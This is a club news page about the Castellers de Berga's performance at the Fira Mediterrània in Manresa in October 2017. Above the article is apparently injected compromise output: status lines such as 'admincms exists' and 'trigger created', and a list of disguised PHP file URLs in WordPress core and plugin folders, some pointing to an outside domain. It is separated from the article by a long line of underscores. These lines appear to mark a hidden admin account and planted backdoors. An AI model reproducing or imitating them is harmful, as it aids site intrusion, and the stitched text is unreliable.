Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?private https://castellersdeberga.cat/wp-admin/install-meta-private-stream-ajax-ajax-response-ajax.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-privacy-data-export-requests-list-table-private-stream-core.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-terms-list-table-wp-core-cron-wp-ajax-response-wp.php https://castellersdeberga.cat/wp-content/plugins/revslider/revslider-ajax-core-ajax-core-wp-meta-cron-ajax-core-wp.php https://castellersdeberga.cat/wp-content/plugins/event-tickets-plus/event-tickets-plus-ajax-response-core-meta-private-private-ajax-ajax-wp-private.php https://castellersdeberga.cat/wp-includes/block-supports/duotone-ajax-meta-ajax-response.php https://castellersdeberga.cat/wp-includes/random_compat/random_bytes_com_dotnet-ajax-wp-cron-private.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Actuació a Manresa
 

Actuació a Manresa


Actuació a ManresaDissabte 7 d’octubre de 2017, dins els actes de la 20a edició de la Fira Mediterrània, vam actuar a Manrsa, a la Plana de l’Om. Ho vam fer acompanyats dels Tirallongues de Manresa, els Castellers de la Vila de Gràcia i els Moixiganguers d’Igualada.
Vam començar l’actuació descarregant un 3 de 7, vam continuar amb un 4 de 7 i vam tancar amb un 2d6. L’actuació va ser àgil malgrat ser 4 colles i el nombrós públic assistent va poder gaudir d’un bon espectacle. Els castells formaven part d’una àmplia programació que va omplir Manresa durant tot el cap de setmana. Vam tancar l’actuació amb un pilar de 5 i, per acabar, 2 pilars de 4.
Cal destacar la magnífica actuació dels Tirallongues de Manresa descarregant 2 de7, 4 de 8 i 7 de 7. Els manresans es troben en el millor estat de forma dels seus 24 anys d’història. Els Moixiganguers d’Igualada van descarregar el 3 de 8, com a millor castell i els de Gràcia, el 4 de 8.
Els Castellers de Berga tornem a actuar a casa el dissabte 21 d’octubre. Ens queden 3 diades per finalitzar la temporada: 21 d’octubre a Berga, 28 d’octubre a Súria i 5 de novembre a Terrassa.